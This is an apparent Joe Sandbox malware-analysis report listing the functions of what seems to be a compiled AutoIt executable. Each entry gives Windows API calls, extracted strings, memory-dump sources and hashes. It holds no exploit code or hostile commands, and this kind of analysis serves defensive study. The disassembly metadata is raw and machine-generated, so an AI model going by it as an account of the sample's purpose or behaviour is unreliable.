              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr$
              • API String ID: 169749273-4025132185
              • Opcode ID: c37c7199cfbb9dcc50d88f65b25b454be179a70f4b2cda4be72ebfc0854732ef
              • Instruction ID: 19b3fb6a043fcd025c03e6a231fd688d1b3c3b233593a0dbd4361462bcb7712e
              • Opcode Fuzzy Hash: c37c7199cfbb9dcc50d88f65b25b454be179a70f4b2cda4be72ebfc0854732ef
              • Instruction Fuzzy Hash: 98617C71108301AFC711EF60DC89D9BBBE8EF99710F500A2DF691931A2DB709A59CF52
              Function 001DB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __wcsnicmp
              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
              • API String ID: 1038674560-1810252412
              • Opcode ID: 9a8805b216609f3066dee90d105885e1e2a97b863838998c6dcf3f0f1e0445aa
              • Instruction ID: bf7d0fa9c4c6fafbfe5434c240fb2986d5cf370c230feb7062ff15b9703e9bfc
              • Opcode Fuzzy Hash: 9a8805b216609f3066dee90d105885e1e2a97b863838998c6dcf3f0f1e0445aa
              • Instruction Fuzzy Hash: 8C31C376A18205E6DB14FA60CD83EEEB7B89F32750F60011AB412721D1EFA1BF14CA51
              Function 001DC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
              Download Yara Rule
              APIs
              • LoadIconW.USER32(00000063), ref: 001DC4D4
              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001DC4E6
              • SetWindowTextW.USER32(?,?), ref: 001DC4FD
              • GetDlgItem.USER32(?,000003EA), ref: 001DC512
              • SetWindowTextW.USER32(00000000,?), ref: 001DC518
              • GetDlgItem.USER32(?,000003E9), ref: 001DC528
              • SetWindowTextW.USER32(00000000,?), ref: 001DC52E
              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001DC54F
              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001DC569
              • GetWindowRect.USER32(?,?), ref: 001DC572
              • SetWindowTextW.USER32(?,?), ref: 001DC5DD
              • GetDesktopWindow.USER32 ref: 001DC5E3
              • GetWindowRect.USER32(00000000), ref: 001DC5EA
              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 001DC636
              • GetClientRect.USER32(?,?), ref: 001DC643
              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 001DC668
              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001DC693
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
              • String ID:
              • API String ID: 3869813825-0
              • Opcode ID: 9f5d49685834e0482b880c56751db27c6bba99248918531dca89c8eea30bcfac
              • Instruction ID: e66d8cd22d349906e6e1df942b63c5fb5711a1362e089a7a855180cf9f8d7905
              • Opcode Fuzzy Hash: 9f5d49685834e0482b880c56751db27c6bba99248918531dca89c8eea30bcfac
              • Instruction Fuzzy Hash: 9851737190070AAFDB20DFA8DE89B6EBBF5FF04705F004929E552A26A1C775F904CB90
              Function 0020A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 0020A4C8
              • DestroyWindow.USER32(?,?), ref: 0020A542
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0020A5BC
              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0020A5DE
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0020A5F1
              • DestroyWindow.USER32(00000000), ref: 0020A613
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00180000,00000000), ref: 0020A64A
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0020A663
              • GetDesktopWindow.USER32 ref: 0020A67C
              • GetWindowRect.USER32(00000000), ref: 0020A683
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0020A69B
              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0020A6B3
                • Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
              • String ID: 0$tooltips_class32
              • API String ID: 1297703922-3619404913
              • Opcode ID: c78fc26a1c47541fcfa60c8c93552d269f474ce3a5852bd36373da97de65be7e
              • Instruction ID: 5f7e630a71d6b0c218e5a47a7b4c2317e50dc9eaf216b8060dddd8a7dbdde3c5
              • Opcode Fuzzy Hash: c78fc26a1c47541fcfa60c8c93552d269f474ce3a5852bd36373da97de65be7e
              • Instruction Fuzzy Hash: AA718970160306AFDB20CF28DC49F667BF9EB89300F48052CF995872A2C772E956CB12
              Function 00204619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 002046AB
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002046F6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharMessageSendUpper
              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
              • API String ID: 3974292440-4258414348
              • Opcode ID: a89e1514c04b559b3417536d15e53465391a22642154914fe1daded5953a7519
              • Instruction ID: eb451f13b2089809f4e89df72a9f8b00f30f53081343a6f067c59f1dc5766941
              • Opcode Fuzzy Hash: a89e1514c04b559b3417536d15e53465391a22642154914fe1daded5953a7519
              • Instruction Fuzzy Hash: 3091A2B46243029FCB14FF10C491A6AB7A5AFA9314F04886DF9965B3E3CB31ED16CB41
              Function 0020BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
              Download Yara Rule
              APIs
              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0020BB6E
              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00209431), ref: 0020BBCA
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0020BC03
              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0020BC46
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0020BC7D
              • FreeLibrary.KERNEL32(?), ref: 0020BC89
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0020BC99
              • DestroyIcon.USER32(?,?,?,?,?,00209431), ref: 0020BCA8
              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0020BCC5
              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0020BCD1
                • Part of subcall function 001A313D: __wcsicmp_l.LIBCMT ref: 001A31C6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
              • String ID: .dll$.exe$.icl
              • API String ID: 1212759294-1154884017
              • Opcode ID: 6fc9f4763c7f92ad11aea7cf07411311fab8ed0ab128202578da490390e9a628
              • Instruction ID: 61b6b83e40bc7cd81f078a74c7afbd72ab9c521a16511c58232e3798714edaa7
              • Opcode Fuzzy Hash: 6fc9f4763c7f92ad11aea7cf07411311fab8ed0ab128202578da490390e9a628
              • Instruction Fuzzy Hash: 6261EF71950319BFEB25DF64DC85BBA77A8EB08710F10411AFD15D61D2DB70AAA0CBA0
              Function 001EA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,0020FB78), ref: 001EA0FC
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • LoadStringW.USER32(?,?,00000FFF,?), ref: 001EA11E
              • __swprintf.LIBCMT ref: 001EA177
              • __swprintf.LIBCMT ref: 001EA190
              • _wprintf.LIBCMT ref: 001EA246
              • _wprintf.LIBCMT ref: 001EA264
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LoadString__swprintf_wprintf$_memmove
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%!
              • API String ID: 311963372-699068131
              • Opcode ID: a52d6af0cd3c9a9fe1418226fb561f3ba14011cde3c1338b978631d0c3647e9e
              • Instruction ID: 3e77ddbb1be5bbff5acebe8583e1cd21ec52f5399b3d509d4bf64662c774678d
              • Opcode Fuzzy Hash: a52d6af0cd3c9a9fe1418226fb561f3ba14011cde3c1338b978631d0c3647e9e
              • Instruction Fuzzy Hash: 0D516C7190460AAACF15FBE0CD86EEEB779AF25300F600165F515720A1EB31AF58CF61
              Function 001EA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • CharLowerBuffW.USER32(?,?), ref: 001EA636
              • GetDriveTypeW.KERNEL32 ref: 001EA683
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA6CB
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA702
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA730
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
              • API String ID: 2698844021-4113822522
              • Opcode ID: 8ed236e7ba2f0c86e46a1fdeecb9275f56dbacf7d8a66600e16e038c4d41ba21
              • Instruction ID: 63347269fd2e1481a8fdfdd7ef1bec8f7e1f32cc73b6735c86039514accd022f
              • Opcode Fuzzy Hash: 8ed236e7ba2f0c86e46a1fdeecb9275f56dbacf7d8a66600e16e038c4d41ba21
              • Instruction Fuzzy Hash: AD5156B51147059FC704EF21C88186AB7E8FFA8718F54496CF896572A1DB31EE0ACF52
              Function 001EA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
              Download Yara Rule
              APIs
              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001EA47A
              • __swprintf.LIBCMT ref: 001EA49C
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 001EA4D9
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001EA4FE
              • _memset.LIBCMT ref: 001EA51D
              • _wcsncpy.LIBCMT ref: 001EA559
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001EA58E
              • CloseHandle.KERNEL32(00000000), ref: 001EA599
              • RemoveDirectoryW.KERNEL32(?), ref: 001EA5A2
              • CloseHandle.KERNEL32(00000000), ref: 001EA5AC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
              • String ID: :$\$\??\%s
              • API String ID: 2733774712-3457252023
              • Opcode ID: d27d6bcce16cbddcb6a145de3d0303852c6a512b1a4d77af5cb2f5af6d36c42d
              • Instruction ID: aba8f606733f66e29453647aa5154287971be4d88a98c8af0daf9c10c0d9391e
              • Opcode Fuzzy Hash: d27d6bcce16cbddcb6a145de3d0303852c6a512b1a4d77af5cb2f5af6d36c42d
              • Instruction Fuzzy Hash: AA31BEB6540249ABDB20DFA1DC49FEF77BCEF89701F5041B6FA08D2161EB70A6448B25
              Function 001EDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
              Download Yara Rule
              APIs
              • __wsplitpath.LIBCMT ref: 001EDC7B
              • _wcscat.LIBCMT ref: 001EDC93
              • _wcscat.LIBCMT ref: 001EDCA5
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001EDCBA
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EDCCE
              • GetFileAttributesW.KERNEL32(?), ref: 001EDCE6
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 001EDD00
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EDD12
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
              • String ID: *.*
              • API String ID: 34673085-438819550
              • Opcode ID: cf6b8d37c80d872fe4e203be56b0322885513757858a60d0b3f24c4b26d0f512
              • Instruction ID: a939ffe7e14e5bebaee39367a9559f44b3c91a1cdf86de3e7eefd81500e6f788
              • Opcode Fuzzy Hash: cf6b8d37c80d872fe4e203be56b0322885513757858a60d0b3f24c4b26d0f512
              • Instruction Fuzzy Hash: A481F4715047809FCB24EF65D8859AEB7E8BF99300F19882EF889C7250E731DD44CB52
              Function 0020C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0020C4EC
              • GetFocus.USER32 ref: 0020C4FC
              • GetDlgCtrlID.USER32(00000000), ref: 0020C507
              • _memset.LIBCMT ref: 0020C632
              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0020C65D
              • GetMenuItemCount.USER32(?), ref: 0020C67D
              • GetMenuItemID.USER32(?,00000000), ref: 0020C690
              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0020C6C4
              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0020C70C
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0020C744
              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0020C779
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
              • String ID: 0
              • API String ID: 1296962147-4108050209
              • Opcode ID: 3446a2afca5295f011796f8e181268d3d4e4b9d9ea7bb765a651e9854fefe82b
              • Instruction ID: 9ed4bf53304ac5805c1d9f656508213eb0e5eb3f47f8887ccf302b14160e977c
              • Opcode Fuzzy Hash: 3446a2afca5295f011796f8e181268d3d4e4b9d9ea7bb765a651e9854fefe82b
              • Instruction Fuzzy Hash: 9B81A0B45183029FD720CF14D988A6BBBE8FF89314F20062DF995972A2D771D915CFA2
              Function 001D83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D8766
                • Part of subcall function 001D874A: GetLastError.KERNEL32(?,001D822A,?,?,?), ref: 001D8770
                • Part of subcall function 001D874A: GetProcessHeap.KERNEL32(00000008,?,?,001D822A,?,?,?), ref: 001D877F
                • Part of subcall function 001D874A: HeapAlloc.KERNEL32(00000000,?,001D822A,?,?,?), ref: 001D8786
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D879D
                • Part of subcall function 001D87E7: GetProcessHeap.KERNEL32(00000008,001D8240,00000000,00000000,?,001D8240,?), ref: 001D87F3
                • Part of subcall function 001D87E7: HeapAlloc.KERNEL32(00000000,?,001D8240,?), ref: 001D87FA
                • Part of subcall function 001D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001D8240,?), ref: 001D880B
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001D8458
              • _memset.LIBCMT ref: 001D846D
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001D848C
              • GetLengthSid.ADVAPI32(?), ref: 001D849D
              • GetAce.ADVAPI32(?,00000000,?), ref: 001D84DA
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001D84F6
              • GetLengthSid.ADVAPI32(?), ref: 001D8513
              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001D8522
              • HeapAlloc.KERNEL32(00000000), ref: 001D8529
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001D854A
              • CopySid.ADVAPI32(00000000), ref: 001D8551
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001D8582
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001D85A8
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001D85BC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
              • String ID:
              • API String ID: 3996160137-0
              • Opcode ID: 50c02b0fc7bbfd541fda40c9ea7d1d174c0515099ddcb0ba7df7351369e89fc4
              • Instruction ID: b1df28807e785c16f484b6cf870ec895a43a0673e1a45907b76741d48b1210e6
              • Opcode Fuzzy Hash: 50c02b0fc7bbfd541fda40c9ea7d1d174c0515099ddcb0ba7df7351369e89fc4
              • Instruction Fuzzy Hash: FB613C71900209AFDF10DFA5ED49AEEBBB9FF04710F14826AF915A7291DB319A05CF60
              Function 001F762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
              Download Yara Rule
              APIs
              • GetDC.USER32(00000000), ref: 001F76A2
              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001F76AE
              • CreateCompatibleDC.GDI32(?), ref: 001F76BA
              • SelectObject.GDI32(00000000,?), ref: 001F76C7
              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 001F771B
              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 001F7757
              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 001F777B
              • SelectObject.GDI32(00000006,?), ref: 001F7783
              • DeleteObject.GDI32(?), ref: 001F778C
              • DeleteDC.GDI32(00000006), ref: 001F7793
              • ReleaseDC.USER32(00000000,?), ref: 001F779E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
              • String ID: (
              • API String ID: 2598888154-3887548279
              • Opcode ID: 22caa261a21ea7994bb43ca5139dafc7f142e2160f3873a1a48a603f4ef4a4e4
              • Instruction ID: edb9e03796ccef0c898e477cb3b7a5b28cad4e8966b8400f0f986f3890c4a529
              • Opcode Fuzzy Hash: 22caa261a21ea7994bb43ca5139dafc7f142e2160f3873a1a48a603f4ef4a4e4
              • Instruction Fuzzy Hash: 6F516C75904309EFDB25CFA8DD88EAEBBB9EF48310F14852DFA5997251D731A840CB60
              Function 00186BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00186C6C,?,00008000), ref: 001A0BB7
                • Part of subcall function 001848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001848A1,?,?,001837C0,?), ref: 001848CE
              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00186D0D
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00186E5A
                • Part of subcall function 001859CD: _wcscpy.LIBCMT ref: 00185A05
                • Part of subcall function 001A387D: _iswctype.LIBCMT ref: 001A3885
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
              • API String ID: 537147316-1018226102
              • Opcode ID: 774ab2aae67258239831e92e67dcaaa716ba94ab6126bff1be4a99a25270d1c8
